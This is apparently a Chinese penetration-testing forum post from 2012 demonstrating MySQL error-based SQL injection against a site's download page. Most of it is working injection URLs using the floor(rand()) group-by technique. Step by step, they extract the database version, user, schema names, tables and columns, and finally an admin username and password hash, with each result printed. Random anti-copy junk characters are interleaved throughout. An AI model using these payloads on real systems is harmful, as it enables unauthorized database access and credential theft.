中国网络渗透测试联盟
标题:
php+mysql高级爆错注入经测算有效
[打印本页]
作者:
admin
时间:
2012-9-13 17:52
标题:
php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
2 r/ x- T. v. t# `. @' x% z7 K- [2 |
0 D- R H Y/ V; n8 C# A& N. H8 f
之前想找个测试 没想到这有 可以测试下做个记录而已
0 {; f. {4 }5 e- W' F: t
0 W4 V% Y' K3 u5 C' h* P* Z
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
& {& h+ Y6 z& L% A9 T( r
! v* L. \5 W. C* F$ X, L: H
/data0/htdocs/leqi_new/app/myapp.php
* d9 }; ?1 |* M9 |$ u
# {% ^0 n: \! O' V' G# `2 }& k+ {
或者
/ `7 U. l3 Y0 u% o# ?! o
% ?: T, q) v3 s% P- [ k
/**********version()**********/ 5.1.49-log
P: ^" g0 _4 b$ H( o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. @; _$ e: v1 {# G$ ]
8 b( h; F# |( O9 _" G+ Q2 X
/**********user()**********/
: |# ]( |# F1 p Z1 Z3 O7 l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 g1 {, Q7 U( L! y: q
* {2 R; ^ b& F2 e% p: ?! E% }: c! I
/**********database()**********/ leqi
# g6 J# K/ B, Y. T" Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: F& s0 A8 \: ?& j, m- l( b- G
2 `* w ^5 {8 T- M5 r6 F! o
/**********limit依次递归爆库**********/
8 J5 N& x# B- J5 m
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ s- C, g$ K* i3 d
information_schema
' a! R, `. P# e. }. i
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ }9 Z8 p1 e4 F- \
leqi
3 ?9 T. b0 a$ D0 j; A: }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 x T9 n) J9 ]) k. q6 x
test
6 Y+ _ G8 U2 s) J! I. ?
- V! f+ G/ B4 V. N. B! q) }
/**********limit依次递归爆表名**********/
+ v$ m1 ]' e1 X0 b: u& D2 G) S* }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 F& t1 o m) R' K% Y
users
* Q! x# ^' o( h7 {! `$ r
% X1 F; N: D. j: ]# K: Q; B
/**********limit依次递归爆字段名**********/
; U% h( \! o3 ]3 D% s1 j, }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 B, w& M' I0 c& o0 B0 g; p
user_id,username,nickname,passwd,group_id
( i4 `- [+ n8 A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
8 t8 \7 l4 m$ A$ e E5 q; L$ @
/wapc/5000_0005_003
# U$ w1 ^& }+ p7 H
11 21
9 Z* T6 O" j3 H% i- h5 Z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, \5 Q1 v, [2 f/ y9 `
/wapc/5000_0005_003
- n) w& o" s! @
11 341 351 361
^3 p+ O# W/ {; N
/**********爆数据**********/
( J8 E3 R; a9 V5 I
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# \, j( |) x! T
admin
1 V" F$ N4 N" V, H5 T/ z4 u3 Q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& I: o, n& ~* u- E8 r
6a8b4574ca231eb8bd52764d4978ffcd
, m0 [! C5 r5 |* `: D
' s) N7 p% Q, z' n, I9 i# }
7 e4 s+ V7 z: ]8 z- }* }- e: u9 f
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2